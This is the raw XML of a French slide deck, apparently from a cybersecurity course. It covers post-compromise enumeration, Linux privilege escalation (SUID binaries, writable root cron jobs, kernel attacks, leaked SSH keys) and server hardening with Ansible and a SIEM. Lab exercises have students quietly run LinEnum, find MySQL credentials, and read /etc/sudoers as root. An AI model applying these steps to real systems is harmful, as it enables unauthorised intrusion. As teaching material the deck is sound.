    <dgm:cxn modelId="{71BC2F92-92A8-49D8-8644-6CD6F602032C}" type="presParOf" srcId="{9A9BD6B7-952E-4B1A-8A7D-F13E678A1168}" destId="{90B0C776-E814-42FD-A080-0399072108DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{FD155B2D-7705-4CEA-B1CC-32D1B2C67A64}" type="presParOf" srcId="{5E6170D8-BE88-465F-B751-46AB0D85F5E3}" destId="{1580239C-2B49-456D-B44B-E55D4BFD850F}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{2CEF43AF-3A91-4074-B45F-D115171FB5C4}" type="presParOf" srcId="{5E6170D8-BE88-465F-B751-46AB0D85F5E3}" destId="{727678E4-0D9F-46F7-88BF-23C314F3F21D}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{2B8215CE-6A89-48CC-BD9B-89E43E61658A}" type="presParOf" srcId="{727678E4-0D9F-46F7-88BF-23C314F3F21D}" destId="{D14108DE-BC13-4BA8-AEC9-92D48F218FC2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DED6A200-2172-460E-9BB1-176BA19091FC}" type="presParOf" srcId="{5E6170D8-BE88-465F-B751-46AB0D85F5E3}" destId="{D2DFB788-3044-4DA3-8534-26E8241AB9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7D9B-9582-4793-88C2-3F447809F4C2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4621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Passive recon</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2100" kern="1200" dirty="0"/>
            <a:t> &amp; OSINT</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="40127" y="737242"/>
        <a:ext cx="1949441" cy="1141260"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B66A686F-6E1F-4C19-B782-07C3267B96E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="222711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227119" y="1157550"/>
        <a:ext cx="299835" cy="300644"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{220DCE5E-7246-48D3-BB6B-97F43BEABF18}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2833255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Active recon </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2100" kern="1200" dirty="0"/>
            <a:t>(scans, …)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2868761" y="737242"/>
        <a:ext cx="1949441" cy="1141260"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9A9BD6B7-952E-4B1A-8A7D-F13E678A1168}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5055754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055754" y="1157550"/>
        <a:ext cx="299835" cy="300644"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1580239C-2B49-456D-B44B-E55D4BFD850F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5661890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Première attaque</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5697396" y="737242"/>
        <a:ext cx="1949441" cy="1141260"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{727678E4-0D9F-46F7-88BF-23C314F3F21D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="788438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7884389" y="1157550"/>
        <a:ext cx="299835" cy="300644"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D2DFB788-3044-4DA3-8534-26E8241AB92D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8490525" y="258196"/>
          <a:ext cx="2020453" cy="209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Avancer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Enumération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Escalade (H/V)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Persistance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Exfiltration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…</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8549702" y="317373"/>
        <a:ext cx="1902099" cy="198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9F2D-E35C-4834-A80C-3C9EADD748D3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E1506-E317-4DBE-B754-6DBD0ACFF8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8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-sec/ansible-collection-hardening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2C56810-117C-80FE-505F-132B42E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25" y="1988927"/>
            <a:ext cx="2127291" cy="2083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969" y="2078966"/>
            <a:ext cx="6411658" cy="2570672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Inventaire &amp; élévation de privilèges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69" y="5046808"/>
            <a:ext cx="6300281" cy="154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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Option Cyber Sécurité 2023 (Bloc 3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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S. Strebelle - C. Badot-Bertrand</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6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3E5E51-CCB6-9871-0793-587F71CD4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6102" b="6102"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="468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Techniques d’élévation verticales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Quelques techniques (non exhaustif) pour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l’élévation de privilèges (V)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Vulnérabilité applicative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(CVE, …)</a:t>
            </a:r>
          </a:p>
          <a:p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Binaires avec flag SUID ou SGID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Scripts CRON exécuté en root &amp; accessibles en écriture</a:t>
            </a:r>
            <a:endParaRPr lang="fr-BE" sz="2400" dirty="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Attaque kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400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(attention au bruit)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Compte accessible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(.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bash_history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, clé SSH, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Services seulement accessibles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> en localhost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10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4382258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Protéger un serveur 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5372073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Découvrez quelques concepts de protection d’un serveur Linux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11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2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Analyse, plans &amp; inventaire réguliers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Network Planning and Implementation - What You Need To Consider in Network  Project Management - HubPages">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75FC25C8-0042-2C73-D952-7F8ABAB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30" y="1489437"/>
            <a:ext cx="6184140" cy="475110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2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Une installation initiale bétonnée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2734A-933A-7F5B-C7B6-7D0FFCA7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53" y="2514485"/>
            <a:ext cx="74295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C61E203A-2298-4446-AF4E-32F60865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7472" y="2024861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25AF68-D19A-AD72-C292-1F4B252B2FC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4529" y="2482061"/>
            <a:ext cx="4642943" cy="109545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154DA5-B1F6-0A92-BCD3-EDD60EF90B6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8093981" y="3023534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A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441A42DD-43DA-EDC7-E081-2EE981D4B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7472" y="38827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FE9782-F360-FFA9-3339-9481E3D7471A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8093981" y="4881397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B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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B3DFC6E5-96C5-BD39-07FC-2F27D957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129" y="310765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7DEFA-489F-BE82-51BF-2D8A0BAE1509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2226143" y="4155258"/>
            <a:ext cx="20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Ansible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99B30-807D-5775-A541-5378634D032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74529" y="3564858"/>
            <a:ext cx="4642943" cy="77506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EB6F10-97AC-920C-886B-9774103B8521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2337628" y="5894303"/>
            <a:ext cx="83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Recommandation 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playbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Ansible « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> » (SSH, NGINX, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/dev-sec/ansible-collection-hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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7B702-B3A3-CFD8-4961-DF0D6938ECB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3774529" y="1526045"/>
            <a:ext cx="4860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Exécute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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configurations d’un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1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playbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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 (SSH)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Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Suppression d’un fichier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Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Ajout d’un utilisateur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Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Installation d’un service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Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto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527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zuh 4.0, les nouvelles fonctionnalités / Guide Open Source">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D343768D-5F88-00DF-0C75-8DCC7FB6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41" y="1432594"/>
            <a:ext cx="24669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Un Security Operations Center avec SIEM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C61E203A-2298-4446-AF4E-32F60865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418" y="179552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25AF68-D19A-AD72-C292-1F4B252B2FC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2592818" y="2252727"/>
            <a:ext cx="5181152" cy="8683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154DA5-B1F6-0A92-BCD3-EDD60EF90B6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354927" y="2794200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A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441A42DD-43DA-EDC7-E081-2EE981D4B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418" y="365339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FE9782-F360-FFA9-3339-9481E3D7471A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354927" y="4652063"/>
            <a:ext cx="15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B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Graphic 20" descr="Server outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3DFC6E5-96C5-BD39-07FC-2F27D957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970" y="266390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7DEFA-489F-BE82-51BF-2D8A0BAE1509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3711505"/>
            <a:ext cx="4179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7384D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Serveur de collecte SIEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17384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ecurity information and event management solution )</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="17384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99B30-807D-5775-A541-5378634D032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592818" y="3121105"/>
            <a:ext cx="5181152" cy="9894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C7B702-B3A3-CFD8-4961-DF0D6938ECB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705884" y="4832016"/>
            <a:ext cx="4860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itchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Permet d’effectuer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Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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l’analyse centralisée de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Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Une corrélation des évènements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Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>De l’analyse forensique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BA815-61B5-7680-9000-58E89437DD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="561530">
            <a:off x="3050650" y="2176560"/>
            <a:ext cx="365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Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Echec d’une commande « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0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11689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autres pistes essentielles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Quelques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points essentiels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à vérifier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Patch management sur tous les serveurs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Audit fréquent de vos serveurs (scan interne, scan externe, …)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Règles de restriction réseau fortes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Principe du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" i="1" dirty="0">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>least privilege 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sur vos serveurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-BE" sz="2000" dirty="0">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Comptes Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-BE" sz="2000" dirty="0">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Accès à la base de données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-BE" sz="2000" dirty="0">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Services sur le serveur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-BE" sz="2000" dirty="0">
                <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>…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5483060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Mise en pratique sur un serveur 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6295963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Vous venez d’effectuer une attaque et devez maintenant prévoir la suite…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1 / On industrialise l’inventaire !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Votre point de départ est l’IP X.X.X.X – des accès SSH ont été trouvés lors d’une reconnaissance passive. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-BE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spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft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Téléchargez l’outil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" dirty="0" err="1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LinEnum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sur le serveur discrètement </a:t>
            </a:r>
            <a:endParaRPr lang="fr-BE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spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft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Analysez les comptes, groupes &amp; services</a:t>
            </a:r>
            <a:endParaRPr lang="fr-BE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Y a-t-il une raison d’être inquiets pour la suite de notre attaque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17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9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2 / Elévation horizontale vers MySQL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1417032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 serveur X.X.X.X possède un service MySQL qui peut contenir des données intéressantes - et vous permettra de déployer d’autres techniques d’élévation (utilisation de user modules, vulnérabilité applicative, etc.)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un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accès au service MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17384D"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t> 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(nom d’utilisateur &amp; mot de passe)</a:t>
            </a:r>
          </a:p>
          <a:p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Prouvez la réussite de votre recherche par un SELECT sur la table d’utilisateurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-BE" sz="24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fr-BE" sz="2400" i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Conseil : regardez les sites NGINX disponibles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18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11489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</a:rPr>
              <a:t>Exercice 3 / Elévation verticale vers root</a:t>
            </a:r>
            <a:endParaRPr lang="fr-BE" sz="4000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Maintenant en possession d’un compte à la base de données – nous allons déployer une autre technique pour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obtenir un accès root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un binaire que nous pouvons utiliser en tant que root (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="24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suid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une élévation possible sur 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</a:rPr>
              <a:t>https://gtfobins.github.io/ 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Prouvez votre attaque en effectuant un « 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</a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="24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fr-BE" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> 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». </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" sz="24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Aucune autre action ne sera acceptée</a:t>
            </a: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19</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-BE" sz="160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Objectifs du cours (2h)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Après une attaque réussie, effectuer une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élévation de privilèges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fr-BE" sz="2400" i="1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Rappels &amp; introduction – partie 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-BE" sz="2400" i="1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Faire l’inventaire d’un serveur Linux – partie 1</a:t>
            </a:r>
          </a:p>
          <a:p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Découvrir les techniques d’élévation – partie 2</a:t>
            </a:r>
          </a:p>
          <a:p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Protéger un serveur – partie 2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5" name="Google Shape;12988;p106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF50D918-EF5A-2C1A-28B4-7E81D667330D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11218243" y="362873"/>
            <a:ext cx="584652" cy="807396"/>
            <a:chOff x="910723" y="1508212"/>
            <a:chExt cx="251660" cy="350166"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="17384D"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Google Shape;12989;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBACB8D6-F4F9-2C35-21CF-FE0FA550281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990;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE050FFC-F675-B630-5BC9-17C2579CB78B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91;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416B838D-61F6-5D73-FF61-997005565B8A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992;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1EC3CF-EC5A-47B5-80B4-FA5B675431D5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993;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6E105D8-908E-D87C-9F96-BC0849564D5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994;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11BD8F77-207E-38E7-ABFC-2FEBBC0EAE8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995;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C24119BC-EE73-1025-1A2B-8F63869AA858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996;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A2417E-D853-EE10-01D8-E2D1F0224B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997;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7120632-4256-DD0E-8D3E-F25D4B707279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998;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6C4F24F-5339-CF58-A772-E26C2D1A5D03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999;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7393ED68-E1C0-7CE3-A495-377869211A1D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3000;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E74A6FAE-3F73-92DA-DFDD-263F0B1F8D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001;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{137550DA-F63E-E707-82D1-331959281216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3002;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A0B4EE8-BD96-7BFF-D1C2-3F100060D51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3003;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9A75CEC-2AEF-861D-5A22-114002D5AACB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3004;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645C8EF2-E6C5-2BD3-C889-8B864B9001AD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3005;p106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDFB3A9-76B1-81DE-2CB8-CC401650D3E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16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Une récap’ de lundi (inventaire)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L’inventaire d’un serveur consiste à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découvrir &amp; énumérer les ressources</a:t>
            </a:r>
          </a:p>
          <a:p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Quand</a:t>
            </a:r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 ? Après une attaque initiale</a:t>
            </a:r>
          </a:p>
          <a:p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Pourquoi</a:t>
            </a:r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 ? Faire progresser l’attaque (élévation, données sensibles, …)</a:t>
            </a:r>
          </a:p>
          <a:p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Attention – vous êtes potentiellement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surveillés</a:t>
            </a:r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 (SOC, EDR, …)</a:t>
            </a:r>
          </a:p>
          <a:p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Via direct remote shell (SSH, …) ou reverse remote shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-BE" sz="2400" dirty="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  <a:p>
            <a:endParaRPr lang="fr-BE" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="17384D"/>
              </a:solidFill>
              <a:latin typeface="Roboto" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" pitchFamily="2" charset="0"/>
            </a:endParaRP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648D779-A7BF-3B1D-CF03-5097AC54B0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609654" y="4457861"/>
            <a:ext cx="10811187" cy="1680385"/>
            <a:chOff x="609654" y="4457861"/>
            <a:chExt cx="10811187" cy="1680385"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Graphic 22" descr="Man outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C15F23-945B-10B7-7551-93FA4956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41191" y="4457861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Server outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9C08EDE-64F1-BCEA-E751-8242B392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03970" y="4461456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7EE613-E0D1-01CD-6D13-D3AE7F0F3435}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3155590" y="5026060"/>
              <a:ext cx="5648379" cy="35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3D4C9E-9A7A-6B5F-0546-4207640E2BC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
